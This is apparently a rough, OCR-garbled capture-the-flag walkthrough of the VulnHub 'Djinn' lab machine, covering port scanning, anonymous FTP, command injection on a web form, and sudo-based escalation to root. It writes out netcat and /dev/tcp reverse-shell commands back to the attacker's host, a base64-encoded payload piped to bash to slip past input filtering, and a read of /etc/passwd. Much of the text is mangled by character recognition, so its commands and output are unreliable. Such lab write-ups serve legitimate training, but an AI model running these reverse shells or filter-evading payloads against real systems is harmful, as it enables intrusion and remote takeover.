Diginn

22 June 2022 05:52 PM

$PORT STATE 21/tcp open ftp-syst: STAT : FTP End -rw-r--r -rw-r- r -rw-r- r SERVICE VERSION ftp vsftpd 3.0.3 server status: ffff:192.168.43.208 Connected to Logged in as ftp TYPE: ASCII No session bandwidth limit Session timeout in seconds is 300 Control connection is plain text Data connections will be plain text At session startup, client count was 2 VSFTPd 3.Ø.3 - secure, fast, stable of status I ftp-anon: Anonymous FTP login allowed (FTP code 230) 0 you creds. txt game. txt message. txt are 11 oct 20 128 Oct 21 113 oct 21 _ \x2øn_ I ( with simple maths 2019 2019 2019 1537/tcp open waste? I fingerprint-strings: DNSStatusRequestTCP: \x20/ Let's see how good$

$Answer my questions 1000 times and I'll give you your gift. DNsversionBindReqTcp: \X20/ _ \x20 1 1 1 1 _ \X20/ I Cl Ill Let's see how good you are with simple maths Answer my questions 1000 times and I'll give you your gift. 1 service unrecognized despite returning data. If you know the service/version, in/submit.cgi?new-service : SF-Port1337-TCP: SF :sversionBindReqTCP , IBC, \X20_ SF : ø_ ' _\x2ø I I \x20 SF : \ I I \x20 ' I I _ \ I I SF : x20\ I I I I I I I SF : Let ' please submit the following$

Google Hacking DB VigenereSolver-ww... LxdPrivilegeEscalatio... GTFOBins Basic Linux Privilege Online-ReverseShell •e BeyondSQLi: Obfusca... GitHub- bonsaiviking/... Home Features Contact [Write-up] Vulnix - Pla. O MDS O Let's see how good your are.

O a 192.168.43.219:7331/wish Google Hacking DB Viqenere Solver - ww... Lid Privileqe Escalatio__ Oh you found me then go on make a wish. This can make all your wishes come true Execute: idl id I nc -esh 192.16&43.2. id I pwd id&&cat letc/passwd

sh •i /dev/tcp/192.168.43.2e8/4444 0>81 Output c2ggLwkgPiYgL2R1di9eY3AvNTkyLjE20C4ØMy4yYDgvNDQeNCAwpiYx

echo "payload" | base64 -d | bash

O a 192.168.43.219:7331/wish Google Hacking DB Vigenere Solver - ww... LxdPrivi1ege Escalari.- Oh you found me then go on make a wish. This can make all your wishes come true Execute: •ONCAwPiYxlbase64-dlbash

H kali@ kali —/Desktop/ctf/vu1nhub/dijinnJ nc -nvlp 4444 listening on [any] 4444 connect to [192.168.43.208] from (UNKNOWN) [192.168.43.219] 49096 sh: O: can't access tty; job control turned off $ $ $ id

$sudo -I Matching Defaults entries for nitish on djinn: env_reset, mail_badpass, : /usr/local/bin\ : /usr/sbin\ :/us User nitish may run the following commands on djinn: (sam) NOPASSWD: /usr/bin/genie genie usage: genie [ -h] [ -g] [ -p SHELL] [ -e EXEC] wish genie: error: the following arguments are required: wish sudo -u sam genie -cmd new my man uid=løøø(sam) /bin/s: not found $ /bin/bahs /bin/sh: 3: /bin/bahs: not found $ /bin/bash 1 sa@dj inn : —$$

strings /usr/bin/genie

$# exit sudo -l Matching Defaults entries for sam on djinn: env_reset, mail_badpass, : /usr/l ocal/bin\ : /usr/ User sam may run the following commands on djinn: (root) NOPASSWD: /root/lago samadjinn:-$ sudo -u root /root/lago What do you want to do ? 1 - Be naughty 2 - Guess the number 3 - Read some damn files 4 - work Enter your choice: 2 Choose a number between 1 to 100: Enter your number: num # is /bin/sh: 1 : is: not found # id uid=ø(root) gid=ø(root) groups=ø(root)$

also we can use lxd to esclate privilege